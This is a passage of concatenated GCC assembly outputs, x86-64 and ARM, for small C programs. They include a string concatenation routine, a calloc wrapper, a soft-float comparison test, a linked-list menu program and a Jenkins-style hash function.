ldr r3, [fp, #-84] mov r2, #5 mov r1, #1 ldr r0, .L31+60 bl fwrite .L27: ldr r3, [fp, #-92] add r3, r3, #1 str r3, [fp, #-92] .L26: ldr r3, [fp, #-92] ldr r2, [fp, #-80] cmp r2, r3 bhi .L28 ldr r2, [fp, #-104] ldr r3, [fp, #-80] add r3, r2, r3 str r3, [fp, #-104] .L25: ldr r3, [fp, #-88] mov r2, #16384 mov r1, #1 ldr r0, .L31+44 bl fread str r0, [fp, #-80] ldr r3, [fp, #-80] cmp r3, #0 bne .L29 ldr r3, [fp, #-104] ldr r2, [fp, #-108] ldr r1, .L31+72 ldr r0, [fp, #-84] bl fprintf .L24: ldr r0, [fp, #-88] bl fclose ldr r0, [fp, #-84] bl fclose mov r3, #0 .L6: ldr r2, .L31 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L30 bl __stack_chk_fail .L30: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L32: .align 2 .L31: .word .LC16 .word .LC1 .word .LC2 .word stderr .word .LC3 .word .LC4 .word .LC5 .word .LC6 .word .LC7 .word .LC8 .word .LC9 .word buf .word zbuf .word .LC10 .word .LC11 .word .LC12 .word .LC13 .word .LC14 .word .LC15 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "32295.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "skipped" .text .globl main .type main, @function main: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 lea rdi, .LC0[rip] call puts@PLT mov eax, 0 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "32295.c" .text .global __aeabi_dcmpun .section .rodata .align 2 .LC0: .ascii "error in __unorddf2vfp(%f, %f) = %d, expected %d\012" .ascii "\000" .text .align 2 .global test__unorddf2vfp .syntax unified .arm .fpu softvfp .type test__unorddf2vfp, %function test__unorddf2vfp: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #40 str r0, [fp, #-20] str r1, [fp, #-16] str r2, [fp, #-28] str r3, [fp, #-24] sub r3, fp, #28 ldmia r3, {r2-r3} sub r1, fp, #20 ldmia r1, {r0-r1} bl __unorddf2vfp str r0, [fp, #-12] sub r3, fp, #20 ldmia r3, {r2-r3} sub r1, fp, #20 ldmia r1, {r0-r1} bl __aeabi_dcmpun mov r3, r0 cmp r3, #0 bne .L2 sub r3, fp, #28 ldmia r3, {r2-r3} sub r1, fp, #28 ldmia r1, {r0-r1} bl __aeabi_dcmpun mov r3, r0 cmp r3, #0 beq .L8 .L2: mov r3, #1 b .L5 .L8: mov r3, #0 .L5: str r3, [fp, #-8] ldr r2, [fp, #-12] ldr r3, [fp, #-8] cmp r2, r3 beq .L6 ldr r3, [fp, #-8] str r3, [sp, #12] ldr r3, [fp, #-12] str r3, [sp, #8] sub r3, fp, #28 ldmia r3, {r2-r3} stm sp, {r2-r3} sub r3, fp, #20 ldmia r3, {r2-r3} ldr r0, .L9 bl printf .L6: ldr r2, [fp, #-12] ldr r3, [fp, #-8] cmp r2, r3 movne r3, #1 moveq r3, #0 and r3, r3, #255 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L10: .align 2 .L9: .word .LC0 .size test__unorddf2vfp, .-test__unorddf2vfp .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 mov r2, #0 ldr r3, .L17 mov r0, #0 mov r1, #0 bl test__unorddf2vfp mov r3, r0 cmp r3, #0 beq .L12 mov r3, #1 b .L13 .L12: mov r2, #0 ldr r3, .L17+4 mov r0, #0 ldr r1, .L17 bl test__unorddf2vfp mov r3, r0 cmp r3, #0 beq .L14 mov r3, #1 b .L13 .L14: mov r2, #0 ldr r3, .L17 mov r0, #0 ldr r1, .L17 bl test__unorddf2vfp mov r3, r0 cmp r3, #0 beq .L15 mov r3, #1 b .L13 .L15: mov r2, #0 ldr r3, .L17+4 mov r0, #0 ldr r1, .L17+4 bl test__unorddf2vfp mov r3, r0 cmp r3, #0 beq .L16 mov r3, #1 b .L13 .L16: mov r3, #0 .L13: mov r0, r3 pop {fp, pc} .L18: .align 2 .L17: .word 2146959360 .word 1072693248 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "495254.c" .intel_syntax noprefix .text .globl ft_strncat .type ft_strncat, @function ft_strncat: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -40[rbp], rdi mov QWORD PTR -48[rbp], rsi mov QWORD PTR -56[rbp], rdx mov rax, QWORD PTR -40[rbp] mov QWORD PTR -16[rbp], rax mov rax, QWORD PTR -48[rbp] mov QWORD PTR -8[rbp], rax mov DWORD PTR -20[rbp], 0 jmp .L2 .L3: add QWORD PTR -16[rbp], 1 .L2: mov rax, QWORD PTR -16[rbp] movzx eax, BYTE PTR [rax] test al, al jne .L3 jmp .L4 .L6: mov rax, QWORD PTR -8[rbp] movzx edx, BYTE PTR [rax] mov rax, QWORD PTR -16[rbp] mov BYTE PTR [rax], dl add QWORD PTR -16[rbp], 1 add QWORD PTR -8[rbp], 1 add DWORD PTR -20[rbp], 1 .L4: mov rax, QWORD PTR -8[rbp] movzx eax, BYTE PTR [rax] test al, al je .L5 mov eax, DWORD PTR -20[rbp] cmp QWORD PTR -56[rbp], rax ja .L6 .L5: mov rax, QWORD PTR -16[rbp] mov BYTE PTR [rax], 0 mov rax, QWORD PTR -40[rbp] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size ft_strncat, .-ft_strncat .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "495254.c" .text .align 2 .global ft_strncat .syntax unified .arm .fpu softvfp .type ft_strncat, %function ft_strncat: @ args = 0, pretend = 0, frame = 32 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #36 str r0, [fp, #-24] str r1, [fp, #-28] str r2, [fp, #-32] ldr r3, [fp, #-24] str r3, [fp, #-16] ldr r3, [fp, #-28] str r3, [fp, #-12] mov r3, #0 str r3, [fp, #-8] b .L2 .L3: ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] .L2: ldr r3, [fp, #-16] ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #0 bne .L3 b .L4 .L6: ldr r3, [fp, #-12] ldrb r2, [r3] @ zero_extendqisi2 ldr r3, [fp, #-16] strb r2, [r3] ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] ldr r3, [fp, #-8] add r3, r3, #1 str r3, [fp, #-8] .L4: ldr r3, [fp, #-12] ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #0 beq .L5 ldr r2, [fp, #-8] ldr r3, [fp, #-32] cmp r2, r3 bcc .L6 .L5: ldr r3, [fp, #-16] mov r2, #0 strb r2, [r3] ldr r3, [fp, #-24] mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size ft_strncat, .-ft_strncat .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "773831.c" .intel_syntax noprefix .text .globl fdevopen .type fdevopen, @function fdevopen: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -8[rbp], rdi mov QWORD PTR -16[rbp], rsi cmp QWORD PTR -8[rbp], 0 je .L2 mov rax, QWORD PTR -8[rbp] mov QWORD PTR stm32l0_stdio_put[rip], rax mov rax, QWORD PTR stdout[rip] jmp .L3 .L2: cmp QWORD PTR -16[rbp], 0 je .L4 mov rax, QWORD PTR -16[rbp] mov QWORD PTR stm32l0_stdio_get[rip], rax mov rax, QWORD PTR stdin[rip] jmp .L3 .L4: mov eax, 0 .L3: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size fdevopen, .-fdevopen .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "773831.c" .text .align 2 .global fdevopen .syntax unified .arm .fpu softvfp .type fdevopen, %function fdevopen: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] str r1, [fp, #-12] ldr r3, [fp, #-8] cmp r3, #0 beq .L2 ldr r2, .L5 ldr r3, [fp, #-8] str r3, [r2] ldr r3, .L5+4 ldr r3, [r3] b .L3 .L2: ldr r3, [fp, #-12] cmp r3, #0 beq .L4 ldr r2, .L5+8 ldr r3, [fp, #-12] str r3, [r2] ldr r3, .L5+12 ldr r3, [r3] b .L3 .L4: mov r3, #0 .L3: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L6: .align 2 .L5: .word stm32l0_stdio_put .word stdout .word stm32l0_stdio_get .word stdin .size fdevopen, .-fdevopen .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "756224.c" .intel_syntax noprefix .text .globl calloc .type calloc, @function calloc: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov QWORD PTR -16[rbp], rsi mov rax, QWORD PTR -8[rbp] imul rax, QWORD PTR -16[rbp] mov rdi, rax call _malloc@PLT leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size calloc, .-calloc .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "756224.c" .text .align 2 .global calloc .syntax unified .arm .fpu softvfp .type calloc, %function calloc: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] str r1, [fp, #-12] ldr r3, [fp, #-8] ldr r2, [fp, #-12] mul r3, r2, r3 mov r0, r3 bl _malloc mov r3, r0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size calloc, .-calloc .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "61006.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "\n SLL is empty!" .LC1: .string " %d " .LC2: .string "->" .text .globl display .type display, @function display: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov edi, 16 call malloc@PLT mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -24[rbp] mov QWORD PTR -8[rbp], rax cmp QWORD PTR -8[rbp], 0 jne .L4 lea rdi, .LC0[rip] mov eax, 0 call printf@PLT jmp .L7 .L6: mov rax, QWORD PTR -8[rbp] mov eax, DWORD PTR [rax] mov esi, eax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR 8[rax] test rax, rax je .L5 lea rdi, .LC2[rip] mov eax, 0 call printf@PLT .L5: mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR 8[rax] mov QWORD PTR -8[rbp], rax .L4: cmp QWORD PTR -8[rbp], 0 jne .L6 .L7: nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size display, .-display .globl insert_End .type insert_End, @function insert_End: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov DWORD PTR -28[rbp], esi mov edi, 16 call malloc@PLT mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] mov edx, DWORD PTR -28[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -8[rbp] mov QWORD PTR 8[rax], 0 mov rax, QWORD PTR -24[rbp] mov QWORD PTR -16[rbp], rax cmp QWORD PTR -16[rbp], 0 jne .L11 mov rax, QWORD PTR -8[rbp] mov QWORD PTR -16[rbp], rax mov rax, QWORD PTR -16[rbp] mov QWORD PTR -24[rbp], rax jmp .L10 .L12: mov rax, QWORD PTR -16[rbp] mov rax, QWORD PTR 8[rax] mov QWORD PTR -16[rbp], rax .L11: mov rax, QWORD PTR -16[rbp] mov rax, QWORD PTR 8[rax] test rax, rax jne .L12 mov rax, QWORD PTR -16[rbp] mov rdx, QWORD PTR -8[rbp] mov QWORD PTR 8[rax], rdx .L10: mov rax, QWORD PTR -24[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size insert_End, .-insert_End .section .rodata .LC3: .string "SLL is empty!" .text .globl delete_End .type delete_End, @function delete_End: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov rax, QWORD PTR -24[rbp] mov QWORD PTR -16[rbp], rax mov rax, QWORD PTR -24[rbp] mov QWORD PTR -8[rbp], rax cmp QWORD PTR -24[rbp], 0 jne .L15 lea rdi, .LC3[rip] mov eax, 0 call printf@PLT mov rax, QWORD PTR -24[rbp] jmp .L16 .L15: mov rax, QWORD PTR -24[rbp] mov rax, QWORD PTR 8[rax] test rax, rax jne .L18 mov QWORD PTR -24[rbp], 0 mov rax, QWORD PTR -24[rbp] jmp .L16 .L19: mov rax, QWORD PTR -16[rbp] mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -16[rbp] mov rax, QWORD PTR 8[rax] mov QWORD PTR -16[rbp], rax .L18: mov rax, QWORD PTR -16[rbp] mov rax, QWORD PTR 8[rax] test rax, rax jne .L19 mov rax, QWORD PTR -8[rbp] mov QWORD PTR 8[rax], 0 mov rax, QWORD PTR -16[rbp] mov rdi, rax call free@PLT mov rax, QWORD PTR -24[rbp] .L16: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size delete_End, .-delete_End .section .rodata .LC4: .string "\n\n ****----- MENU -----****" .LC5: .string "\n 1. INSERT (at End)" .LC6: .string "\n 2. DELETE (from End)" .LC7: .string "\n 3. DISPLAY" .LC8: .string "\n 4. EXIT" .LC9: .string "\n\n Enter your choice : " .LC10: .string "%d" .align 8 .LC11: .string "\n Enter the number to Insert at the end of SLL :" .LC12: .string "\n Insertion done !" .LC13: .string "\n Deletion done !" .LC14: .string "\n Elements of SLL are : " .text .globl main .type main, @function main: .LFB9: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov QWORD PTR -16[rbp], 0 .L26: lea rdi, .LC4[rip] mov eax, 0 call printf@PLT lea rdi, .LC5[rip] mov eax, 0 call printf@PLT lea rdi, .LC6[rip] mov eax, 0 call printf@PLT lea rdi, .LC7[rip] mov eax, 0 call printf@PLT lea rdi, .LC8[rip] call puts@PLT lea rdi, .LC9[rip] mov eax, 0 call printf@PLT lea rax, -24[rbp] mov rsi, rax lea rdi, .LC10[rip] mov eax, 0 call __isoc99_scanf@PLT mov eax, DWORD PTR -24[rbp] cmp eax, 4 je .L21 cmp eax, 4 jg .L22 cmp eax, 3 je .L23 cmp eax, 3 jg .L22 cmp eax, 1 je .L24 cmp eax, 2 je .L25 jmp .L22 .L24: lea rdi, .LC11[rip] mov eax, 0 call printf@PLT lea rax, -20[rbp] mov rsi, rax lea rdi, .LC10[rip] mov eax, 0 call __isoc99_scanf@PLT mov edx, DWORD PTR -20[rbp] mov rax, QWORD PTR -16[rbp] mov esi, edx mov rdi, rax call insert_End mov QWORD PTR -16[rbp], rax lea rdi, .LC12[rip] mov eax, 0 call printf@PLT jmp .L22 .L25: mov rax, QWORD PTR -16[rbp] mov rdi, rax call delete_End mov QWORD PTR -16[rbp], rax lea rdi, .LC13[rip] mov eax, 0 call printf@PLT jmp .L22 .L23: lea rdi, .LC14[rip] call puts@PLT mov rax, QWORD PTR -16[rbp] mov rdi, rax call display jmp .L22 .L21: mov edi, 0 call exit@PLT .L22: mov eax, DWORD PTR -24[rbp] cmp eax, 4 jne .L26 mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L28 call __stack_chk_fail@PLT .L28: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE9: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "61006.c" .text .section .rodata .align 2 .LC0: .ascii "\012 SLL is empty!\000" .align 2 .LC1: .ascii " %d \000" .align 2 .LC2: .ascii "->\000" .text .align 2 .global display .syntax unified .arm .fpu softvfp .type display, %function display: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] mov r0, #8 bl malloc mov r3, r0 str r3, [fp, #-8] ldr r3, [fp, #-16] str r3, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #0 bne .L4 ldr r0, .L8 bl printf b .L7 .L6: ldr r3, [fp, #-8] ldr r3, [r3] mov r1, r3 ldr r0, .L8+4 bl printf ldr r3, [fp, #-8] ldr r3, [r3, #4] cmp r3, #0 beq .L5 ldr r0, .L8+8 bl printf .L5: ldr r3, [fp, #-8] ldr r3, [r3, #4] str r3, [fp, #-8] .L4: ldr r3, [fp, #-8] cmp r3, #0 bne .L6 .L7: nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L9: .align 2 .L8: .word .LC0 .word .LC1 .word .LC2 .size display, .-display .align 2 .global insert_End .syntax unified .arm .fpu softvfp .type insert_End, %function insert_End: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] str r1, [fp, #-20] mov r0, #8 bl malloc mov r3, r0 str r3, [fp, #-8] ldr r3, [fp, #-8] ldr r2, [fp, #-20] str r2, [r3] ldr r3, [fp, #-8] mov r2, #0 str r2, [r3, #4] ldr r3, [fp, #-16] str r3, [fp, #-12] ldr r3, [fp, #-12] cmp r3, #0 bne .L13 ldr r3, [fp, #-8] str r3, [fp, #-12] ldr r3, [fp, #-12] str r3, [fp, #-16] b .L12 .L14: ldr r3, [fp, #-12] ldr r3, [r3, #4] str r3, [fp, #-12] .L13: ldr r3, [fp, #-12] ldr r3, [r3, #4] cmp r3, #0 bne .L14 ldr r3, [fp, #-12] ldr r2, [fp, #-8] str r2, [r3, #4] .L12: ldr r3, [fp, #-16] mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size insert_End, .-insert_End .section .rodata .align 2 .LC3: .ascii "SLL is empty!\000" .text .align 2 .global delete_End .syntax unified .arm .fpu softvfp .type delete_End, %function delete_End: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] ldr r3, [fp, #-16] str r3, [fp, #-12] ldr r3, [fp, #-16] str r3, [fp, #-8] ldr r3, [fp, #-16] cmp r3, #0 bne .L17 ldr r0, .L22 bl printf ldr r3, [fp, #-16] b .L18 .L17: ldr r3, [fp, #-16] ldr r3, [r3, #4] cmp r3, #0 bne .L20 mov r3, #0 str r3, [fp, #-16] ldr r3, [fp, #-16] b .L18 .L21: ldr r3, [fp, #-12] str r3, [fp, #-8] ldr r3, [fp, #-12] ldr r3, [r3, #4] str r3, [fp, #-12] .L20: ldr r3, [fp, #-12] ldr r3, [r3, #4] cmp r3, #0 bne .L21 ldr r3, [fp, #-8] mov r2, #0 str r2, [r3, #4] ldr r0, [fp, #-12] bl free ldr r3, [fp, #-16] .L18: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L23: .align 2 .L22: .word .LC3 .size delete_End, .-delete_End .section .rodata .align 2 .LC4: .ascii "\012\012 ****----- MENU -----****\000" .align 2 .LC5: .ascii "\012 1. INSERT (at End)\000" .align 2 .LC6: .ascii "\012 2. DELETE (from End)\000" .align 2 .LC7: .ascii "\012 3. DISPLAY\000" .align 2 .LC8: .ascii "\012 4. EXIT\000" .align 2 .LC9: .ascii "\012\012 Enter your choice : \000" .align 2 .LC10: .ascii "%d\000" .align 2 .LC11: .ascii "\012 Enter the number to Insert at the end of SLL :" .ascii "\000" .align 2 .LC12: .ascii "\012 Insertion done !\000" .align 2 .LC13: .ascii "\012 Deletion done !\000" .align 2 .LC14: .ascii "\012 Elements of SLL are : \000" .align 2 .LC15: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 ldr r3, .L34 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 mov r3, #0 str r3, [fp, #-12] .L31: ldr r0, .L34+4 bl printf ldr r0, .L34+8 bl printf ldr r0, .L34+12 bl printf ldr r0, .L34+16 bl printf ldr r0, .L34+20 bl puts ldr r0, .L34+24 bl printf sub r3, fp, #20 mov r1, r3 ldr r0, .L34+28 bl __isoc99_scanf ldr r3, [fp, #-20] sub r3, r3, #1 cmp r3, #3 ldrls pc, [pc, r3, asl #2] b .L25 .L27: .word .L30 .word .L29 .word .L28 .word .L26 .L30: ldr r0, .L34+32 bl printf sub r3, fp, #16 mov r1, r3 ldr r0, .L34+28 bl __isoc99_scanf ldr r3, [fp, #-16] mov r1, r3 ldr r0, [fp, #-12] bl insert_End str r0, [fp, #-12] ldr r0, .L34+36 bl printf b .L25 .L29: ldr r0, [fp, #-12] bl delete_End str r0, [fp, #-12] ldr r0, .L34+40 bl printf b .L25 .L28: ldr r0, .L34+44 bl puts ldr r0, [fp, #-12] bl display b .L25 .L26: mov r0, #0 bl exit .L25: ldr r3, [fp, #-20] cmp r3, #4 bne .L31 mov r3, #0 ldr r2, .L34 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L33 bl __stack_chk_fail .L33: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L35: .align 2 .L34: .word .LC15 .word .LC4 .word .LC5 .word .LC6 .word .LC7 .word .LC8 .word .LC9 .word .LC10 .word .LC11 .word .LC12 .word .LC13 .word .LC14 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "221177.c" .intel_syntax noprefix .text .globl hashword .type hashword, @function hashword: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -24[rbp], rdi mov QWORD PTR -32[rbp], rsi mov DWORD PTR -36[rbp], edx mov rax, QWORD PTR -32[rbp] lea edx, 0[0+rax*4] mov eax, DWORD PTR -36[rbp] add eax, edx sub eax, 559038737 mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] mov DWORD PTR -8[rbp], eax mov eax, DWORD PTR -8[rbp] mov DWORD PTR -12[rbp], eax jmp .L2 .L3: mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -12[rbp], eax mov rax, QWORD PTR -24[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -8[rbp], eax mov rax, QWORD PTR -24[rbp] add rax, 8 mov eax, DWORD PTR [rax] add DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] sub DWORD PTR -12[rbp], eax mov eax, DWORD PTR -4[rbp] rol eax, 4 xor DWORD PTR -12[rbp], eax mov eax, DWORD PTR -8[rbp] add DWORD PTR -4[rbp], eax mov eax, DWORD PTR -12[rbp] sub DWORD PTR -8[rbp], eax mov eax, DWORD PTR -12[rbp] rol eax, 6 xor DWORD PTR -8[rbp], eax mov eax, DWORD PTR -4[rbp] add DWORD PTR -12[rbp], eax mov eax, DWORD PTR -8[rbp] sub DWORD PTR -4[rbp], eax mov eax, DWORD PTR -8[rbp] rol eax, 8 xor DWORD PTR -4[rbp], eax mov eax, DWORD PTR -12[rbp] add DWORD PTR -8[rbp], eax mov eax, DWORD PTR -4[rbp] sub DWORD PTR -12[rbp], eax mov eax, DWORD PTR -4[rbp] rol eax, 16 xor DWORD PTR -12[rbp], eax mov eax, DWORD PTR -8[rbp] add DWORD PTR -4[rbp], eax mov eax, DWORD PTR -12[rbp] sub DWORD PTR -8[rbp], eax mov eax, DWORD PTR -12[rbp] ror eax, 13 xor DWORD PTR -8[rbp], eax mov eax, DWORD PTR -4[rbp] add DWORD PTR -12[rbp], eax mov eax, DWORD PTR -8[rbp] sub DWORD PTR -4[rbp], eax mov eax, DWORD PTR -8[rbp] rol eax, 4 xor DWORD PTR -4[rbp], eax mov eax, DWORD PTR -12[rbp] add DWORD PTR -8[rbp], eax sub QWORD PTR -32[rbp], 3 add QWORD PTR -24[rbp], 12 .L2: cmp QWORD PTR -32[rbp], 3 ja .L3 cmp QWORD PTR -32[rbp], 3 je .L4 cmp QWORD PTR -32[rbp], 3 ja .L5 cmp QWORD PTR -32[rbp], 2 je .L6 cmp QWORD PTR -32[rbp], 2 ja .L5 cmp QWORD PTR -32[rbp], 0 je .L10 cmp QWORD PTR -32[rbp], 1 je .L8 jmp .L5 .L4: mov rax, QWORD PTR -24[rbp] add rax, 8 mov eax, DWORD PTR [rax] add DWORD PTR -4[rbp], eax .L6: mov rax, QWORD PTR -24[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -8[rbp], eax .L8: mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -12[rbp], eax mov eax, DWORD PTR -8[rbp] xor DWORD PTR -4[rbp], eax mov eax, DWORD PTR -8[rbp] rol eax, 14 sub DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] xor DWORD PTR -12[rbp], eax mov eax, DWORD PTR -4[rbp] rol eax, 11 sub DWORD PTR -12[rbp], eax mov eax, DWORD PTR -12[rbp] xor DWORD PTR -8[rbp], eax mov eax, DWORD PTR -12[rbp] ror eax, 7 sub DWORD PTR -8[rbp], eax mov eax, DWORD PTR -8[rbp] xor DWORD PTR -4[rbp], eax mov eax, DWORD PTR 